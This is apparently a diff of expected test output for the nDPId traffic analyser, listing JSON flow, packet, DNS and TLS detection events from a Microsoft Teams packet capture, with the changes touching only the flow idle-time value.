00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041680611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041680294,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -110,57 +110,57 @@ 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1587041681744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1587041681744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC9OkBAADkRg5jAqAEBwKgBBgA19oIAqQAAcuiBgAABAAMAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAvAACoVYXNtLWFwaS1wcm9kLWV1LXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsABoOd2V1MS1hcGktdGVhbXMIY2xvdWRhcHDAZsB3AAEAAQAAAAoABDRyS0Y="} 
00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1587041681754,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1587041681754,"pkt":"KDc3AG3IEBMx8Tl2CABFAACo\/M1AADkRwR\/AqAEBwKgBBgA1x1kAlAAAiC2BgAABAAMAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAHADAAFAAEAAAb4ACQPYXNtLWFwaS1wcm9kLWV1DnRyYWZmaWNtYW5hZ2VyA25ldADAMgAFAAEAAAEsABoOd2V1MS1hcGktc2t5cGUIY2xvdWRhcHDAUcBiAAEAAQAAAAUABDRyS0U="} 
00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"} 
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"} 
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="} 